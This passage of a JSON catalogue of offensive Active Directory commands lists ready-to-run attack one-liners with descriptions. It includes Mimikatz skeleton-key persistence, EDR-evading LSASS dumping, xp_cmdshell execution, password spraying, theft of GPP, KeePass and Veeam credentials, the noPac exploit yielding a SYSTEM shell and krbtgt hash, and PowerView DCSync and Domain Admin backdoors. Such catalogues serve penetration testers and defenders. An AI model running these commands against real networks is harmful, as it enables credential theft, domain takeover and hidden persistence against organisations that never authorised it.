ticket.kirbi","mitre":["T1550.003"],"requires":["Shell","TGT"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/"],"added":true},{"id":"wadcoms:Mimikatz-SkeletonKey","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-SkeletonKey","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"mimikatz.exe \"privilege::debug\" \"misc::skeleton\" exit","description":"Mimikatz misc::skeleton patches the LSASS process of a live domain controller in memory so that a master password (the hardcoded default 'mimikatz') is accepted for any domain account alongside each user's real password. It is a stealthy but volatile persistence primitive: the patch lives only in memory and is lost on DC reboot, and it downgrades some Kerberos encryption which detections watch for. It requires Domain Admin / SeDebugPrivilege on the DC and only works against DCs not running LSA as a protected process.\n\nCommand Reference:\n\n\tTarget: Domain Controller DC01 (dc.test.local)\n\n\tMaster password: mimikatz (built-in default)","mitre":["T1556.001"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"added":true},{"id":"wadcoms:Nanodump-LSASS","toolId":"wadcoms:Nanodump","toolName":"Nanodump","name":"Nanodump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Defense Evasion"],"nativeCategory":["Credential Access","Defense Evasion"],"command":"nanodump.x64.exe --fork --valid --write C:\\Windows\\Temp\\lsass.dmp","description":"Nanodump is an OPSEC-aware LSASS dumper that reads process memory and writes a minidump without calling the heavily monitored MiniDumpWriteDump API, avoiding many EDR hooks. --fork clones the LSASS process and dumps the copy to reduce detection, and --valid restores the dump's signature so pypykatz or Mimikatz can parse it (nanodump writes an invalid signature by default to evade disk scanners). It requires local administrator / SeDebugPrivilege; exfil the dump and parse it offline.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:NetExec-LDAP-ADCS","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ADCS","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate Enterprise CAs and certificate templates over LDAP\nnxc ldap 10.10.10.1 -u john -p password123 -M adcs","description":"The NetExec (nxc) ldap module -M adcs enumerates Active Directory Certificate Services by querying the Configuration partition over LDAP, listing the Enterprise CAs and the certificate templates published in the domain. It is a quick way to confirm AD CS is present and to gather CA and template names before running Certipy to hunt for vulnerable (ESC) configurations. Requires any valid domain account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2"],"added":true},{"id":"wadcoms:NetExec-LDAP-MAQ","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-MAQ","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Read ms-DS-MachineAccountQuota (how many computer accounts this user may add)\nnxc ldap 10.10.10.1 -u john -p password123 -M maq\n# Confirm the authenticated identity / domain SID\nnxc ldap 10.10.10.1 -u john -p password123 -M whoami","description":"The NetExec (nxc) ldap module -M maq reads the ms-DS-MachineAccountQuota attribute, revealing how many computer accounts an authenticated user is allowed to create (default 10). A non-zero quota is a prerequisite for attacks that need a controlled computer object, such as Resource-Based Constrained Delegation (RBCD) and Shadow Credentials. The -M whoami module confirms the authenticated context and domain SID. Both need only a valid low-privileged account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:NetExec-MSSQL-CmdExec","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-CmdExec","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement"],"command":"# OS command via xp_cmdshell\nnxc mssql 10.10.10.1 -u john -p password123 -x \"whoami /all\"\n\n# PowerShell command\nnxc mssql 10.10.10.1 -u john -p password123 -X \"$PSVersionTable\"","description":"NetExec's mssql -x runs an operating-system command through xp_cmdshell (it will enable the option automatically if the login is sysadmin), returning stdout. Use -X instead to execute a PowerShell command block. Command execution runs as the SQL Server service account and requires sysadmin; enabling xp_cmdshell is a high-signal event.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-LocalAuth","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-LocalAuth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Lateral Movement"],"nativeCategory":["Credential Access","Lateral Movement"],"command":"# Local SQL login (e.g. sa) rather than domain auth\nnxc mssql 10.10.10.1 -u sa -p password123 --local-auth\n\n# Spray a local sa password across a subnet\nnxc mssql 10.10.10.0/24 -u sa -p password123 --local-auth","description":"With --local-auth, NetExec authenticates the SQL Server login as a local (mixed-mode) account instead of a domain principal — the classic case being the sa account or a recovered application login. This is useful for password spraying a reused sa password across many hosts, or logging into an instance that is not domain-joined. Combine with -q, -x, or a module once authenticated.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: sa\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-Priv","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Priv","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Enumerate impersonation / db_owner privesc paths\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv\n\n# Escalate the current login to sysadmin\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv -o ACTION=privesc","description":"The mssql_priv NetExec module enumerates and abuses privilege-escalation paths inside a SQL Server instance — principals the login can impersonate (EXECUTE AS / IMPERSONATE), and db_owner membership on databases owned by a high-privileged principal. Run it with no options to enumerate available paths; run it with ACTION=privesc to walk the chain and grant the current login sysadmin. Add ACTION=rollback to undo the change afterwards.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-Query","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Query","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"nxc mssql 10.10.10.1 -u john -p password123 -q \"SELECT @@version\"\n\n# domain (Windows) auth\nnxc mssql 10.10.10.1 -u john -p password123 --windows-auth -q \"SELECT SYSTEM_USER\"","description":"NetExec's mssql protocol authenticates to SQL Server and runs an arbitrary T-SQL statement with -q/--query, printing the result set. It is the quickest way to fingerprint an instance (@@version), enumerate databases, or check the effective privileges of the login. Add -windows-auth to authenticate the domain account over NTLM rather than SQL auth.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-noPac","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec nopac Module","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M nopac","description":"The NetExec/nxc smb 'nopac' module automates the CVE-2021-42278 + CVE-2021-42287 sAMAccountName spoofing chain from a single authenticated SMB connection. It confirms the DC is vulnerable, creates and renames a machine account, and requests an impersonating service ticket, saving the resulting ccache to disk for reuse with impacket tools. Requires MachineAccountQuota > 0 and a DC missing the November 2021 patches; it is a fast way to validate the primitive during an engagement.\n\nCommand Reference:\n\n\tDomain / DC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB","Kerberos","LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:NetExec-SMB-GPPAutologin","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPAutologin","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_autologin","description":"The gpp_autologin module parses Registry.xml files pushed through Group Policy Preferences in SYSVOL and extracts autologon credentials (DefaultUserName / DefaultPassword) configured for interactive logon. Unlike cpassword these values are stored in cleartext, so no decryption is needed. Any domain account can read SYSVOL, making this a fast credential-hunting check against the domain controller alongside gpp_password.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true},{"id":"wadcoms:NetExec-SMB-GPPPassword","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_password","description":"The gpp_password module searches SYSVOL for Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, etc.) that contain a cpassword attribute, then decrypts it using the AES key Microsoft published in MSDN. Any authenticated domain user can read SYSVOL, so this is a classic quick win for recovering local admin or service account passwords set via GPP. Microsoft patched (MS14-025) the ability to create new GPP passwords but did not remove existing ones, so legacy cpassword values still linger in many domains.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true},{"id":"wadcoms:NetExec-SMB-KeePassDiscover","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassDiscover","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_discover","description":"The keepass_discover module remotely enumerates a target for running KeePass processes and for KeePass.config.xml configuration files, reporting the paths it finds. This is the reconnaissance step before keepass_trigger: you need the config file path to plant a malicious export trigger. Requires local admin on the target so the module can inspect processes and the user's AppData. No database is opened or modified at this stage.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true},{"id":"wadcoms:NetExec-SMB-KeePassTrigger","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassTrigger","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_trigger -o KEEPASS_CONFIG_PATH=\"C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml\"","description":"The keepass_trigger module abuses KeePass's trigger system: it edits KeePass.config.xml (path found via keepass_discover) to add a malicious export trigger, so the next time the victim unlocks their database KeePass silently exports every entry in cleartext to a location the operator can read. The default ACTION=ALL adds the trigger, waits, retrieves and parses the export, then cleans up. Requires local admin on the host and that the user actually opens their vault; it is noisier and higher-risk than passive hunting, so restore the config afterward.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tKeePass config path: C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true},{"id":"wadcoms:NetExec-SMB-SpiderPlus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-SpiderPlus","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Discovery"],"nativeCategory":["Collection","Discovery"],"command":"# JSON share/file inventory only (metadata, no downloads)\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus\n\n# Download every readable file under the size limit\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus -o DOWNLOAD_FLAG=True","description":"The spider_plus module walks every share the authenticated user can read and writes a per-host JSON inventory of file metadata (path, size, ctime/mtime/atime) to the output folder, giving you a fast triage map of what exists before you pull anything down. By default it only catalogs; setting DOWNLOAD_FLAG=True makes it copy files under MAX_FILE_SIZE to the loot folder. Prefer the metadata-only run first to stay quiet and avoid mass file reads. Good starting point for share enumeration at scale with a single low-priv credential.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/spidering-shares"],"added":true},{"id":"wadcoms:NetExec-SMB-Veeam","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Veeam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M veeam","description":"The veeam module locates a Veeam Backup & Replication configuration database on the target, reads the stored credential records and decrypts them, recovering the accounts Veeam uses for backups (often domain or local admin). Because backup servers are commonly configured with highly privileged service accounts, this is a frequent path to escalation. Requires local admin on the Veeam server so the module can reach the backing SQL database and DPAPI material.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"added":true},{"id":"wadcoms:Nltest-DomainTrusts-Discovery","toolId":"wadcoms:Nltest","toolName":"Nltest","name":"Nltest-DomainTrusts-Discovery","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery","Enumeration"],"command":"# List all trust relationships in the forest\nnltest /domain_trusts /all_trusts\n# Enumerate domain controllers for the domain\nnltest /dclist:test.local","description":"nltest.exe is a signed Windows built-in (living-off-the-land) used to map trust relationships and locate domain controllers from an existing foothold, with no third-party tooling dropped to disk. /domain_trusts /all_trusts lists every trust relationship in the forest, and /dclist:<domain> enumerates the DCs for a domain - both useful for planning cross-domain and cross-forest movement. It runs in the current user's context on any domain-joined host.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":["T1482"],"requires":["Shell"],"services":["LDAP","Kerberos"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:noPac-SAMSpoof","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac (CVE-2021-42278 + CVE-2021-42287)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# Interactive SYSTEM shell on the DC\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -shell\n\n# Dump the krbtgt hash via secretsdump\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user krbtgt","description":"noPac.py (Ridter) chains CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion) to escalate from a low-privileged domain user to SYSTEM on the Domain Controller. It adds a new machine account, renames its sAMAccountName to match the DC (dropping the trailing $), requests a TGT, restores the name, then performs S4U2self to obtain a service ticket impersonating a Domain Admin. Requires MachineAccountQuota > 0 (default 10) and a DC unpatched against the November 2021 fixes. Use -shell for an interactive SYSTEM shell via smbexec or -dump to run secretsdump against the DC.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1\n\n\tDC host: DC01\n\n\tImpersonate: administrator","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:noPac-Scanner","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac Vulnerability Scanner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"python3 scanner.py test.local/john:password123 -dc-ip 10.10.10.1 -use-ldap","description":"scanner.py ships with Ridter's noPac and safely checks whether a Domain Controller is exploitable via the sAMAccountName spoofing chain without adding or renaming any accounts. It authenticates as a normal domain user and reports the current MachineAccountQuota and whether the DC is patched against CVE-2021-42278 / CVE-2021-42287. Run it first as a low-noise reconnaissance step before launching the full noPac.py exploit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP","SMB"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:PowerMad-NewMachineAccount","toolId":"wadcoms:PowerMad","toolName":"PowerMad","name":"PowerMad-NewMachineAccount","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Import Powermad and create a new machine account\nImport-Module .\\Powermad.ps1\nNew-MachineAccount -MachineAccount EVILPC -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force)","description":"Powermad's New-MachineAccount cmdlet creates a new computer account in the domain over LDAP/SAMR from a Windows foothold, abusing the default ms-DS-MachineAccountQuota (10) that lets any authenticated user add machine accounts. The resulting account, with a password you supply, is the controlled principal for RBCD and shadow-credential chains carried out with SharpAllowedToAct or Rubeus. Run it in-session as any domain user; verify the quota is non-zero first.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tNew machine account: EVILPC\n\n\tPassword: password123","mitre":[],"requires":["PowerShell","Shell"],"services":["LDAP"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true},{"id":"wadcoms:PowerUpSQL-Get-SQLServerLinkCrawl","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Get-SQLServerLinkCrawl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement"],"nativeCategory":["PrivEsc","Lateral Movement"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Crawl all linked servers from the starting instance\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')\"\n\n# Run an OS command on any node that allows it\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"exec master..xp_cmdshell 'whoami'\"","description":"Get-SQLServerLinkCrawl recursively follows linked-server definitions from a starting instance, executing a query at every hop via OPENQUERY chains. Because linked servers frequently run under a higher-privileged (often sysadmin) mapped login on the remote side, crawling the graph commonly yields privilege escalation or lateral movement to instances the operator could not reach directly. Supply -Query to fingerprint each node, or drive command execution through xp_cmdshell across the chain.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerUpSQL-GetSQLInstanceDomain","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-GetSQLInstanceDomain","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery","Enumeration"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Discover SQL Server instances from SPNs in the domain\nGet-SQLInstanceDomain\n\n# Then test which ones accept the current user\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose","description":"Get-SQLInstanceDomain queries the domain via LDAP for Service Principal Names beginning with MSSQL*, revealing every registered SQL Server instance and the account it runs as without touching a single database. It is the standard domain-wide MSSQL discovery step and runs under the current user's context from a domain-joined foothold. Pipe the results into Get-SQLConnectionTestThreaded to find which instances your account can actually log into.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["MSSQL","LDAP"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerUpSQL-Invoke-SQLAudit","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Invoke-SQLAudit","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Audit an instance for privesc issues\nInvoke-SQLAudit -Verbose -Instance 10.10.10.1\n\n# Execute an OS command through the instance\nInvoke-SQLOSCmd -Verbose -Instance 10.10.10.1 -Command \"whoami\"","description":"Invoke-SQLAudit runs PowerUpSQL's battery of privilege-escalation checks against an instance and reports exploitable misconfigurations (impersonation, trustworthy databases, agent jobs, etc.). Where the login already has the rights, Invoke-SQLOSCmd executes an operating-system command through the instance (using xp_cmdshell), returning output. Both take -Instance in HOST\\INSTANCE or HOST,PORT form and use integrated auth by default.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerView-AddDomainGroupMember-DA","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainGroupMember-DA","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members john -Verbose\n# Verify\nGet-DomainGroupMember -Identity 'Domain Admins' | select MemberName","description":"Add-DomainGroupMember adds a principal to a group over LDAP, and when you hold write access to the membership of a privileged group (for example via an abusable GenericAll/WriteMembers ACE) this promotes a controlled account straight into Domain Admins. This is a loud, high-impact change that should be reverted with Remove-DomainGroupMember after the objective; it is often paired with -Credential to act as the principal that actually holds the right.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:PowerView-AddDomainObjectAcl-DCSync","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainObjectAcl-DCSync","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Privilege Escalation"],"nativeCategory":["Persistence","Credential Access","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\n# Grant john DCSync replication rights on the domain object\nAdd-DomainObjectAcl -TargetIdentity 'DC=test,DC=local' -PrincipalIdentity john -Rights DCSync -Verbose","description":"Add-DomainObjectAcl grants an ACE on a target object to a principal you control. Targeting the domain head with -Rights DCSync adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, letting your account replicate secrets (a DCSync attack) without being a Domain Admin. This requires that your current context can already write the domain object's DACL (e.g. WriteDacl on the domain), and it is a durable backdoor that should be cleaned up with Remove-DomainObjectAcl.\n\nCommand Reference:\n\n\tPrincipal granted rights: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html"],"added":true},{"id":"wadcoms:PowerView-ASREPRoastable","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-ASREPRoastable","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol -Verbose","description":"Get-DomainUser -PreauthNotRequired finds accounts with the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which are AS-REP roastable because a DC will return an encrypted AS-REP without prior authentication. Use it to identify targets whose AS-REP hash you can then crack offline. This is an LDAP read only; the actual roast is performed with a separate tool such as Rubeus or GetNPUsers.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true},{"id":"wadcoms:PowerView-DomainTrust","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-DomainTrust","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# Trusts of the current domain\nGet-DomainTrust\n# Forest / inter-forest trusts\nGet-ForestTrust\n# Recursively map every reachable trust\nGet-DomainTrustMapping","description":"Get-DomainTrust enumerates the trust relationships of the current (or a specified) domain, while Get-ForestTrust returns forest-level (inter-forest) trusts. Reading trust direction, transitivity, and SID-filtering state is the first step in planning cross-domain and cross-forest attacks such as foreign group membership abuse or trust-key based ticket forging. Get-DomainTrustMapping walks reachable domains recursively to build the full trust graph.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-FindLocalAdminAccess","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-FindLocalAdminAccess","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\nFind-LocalAdminAccess -Verbose | Out-File output.txt","description":"Find-LocalAdminAccess queries the domain for all computers and then, using the OpenServiceControlManager check, tests each one to see whether the current user context has local administrator access. It is the 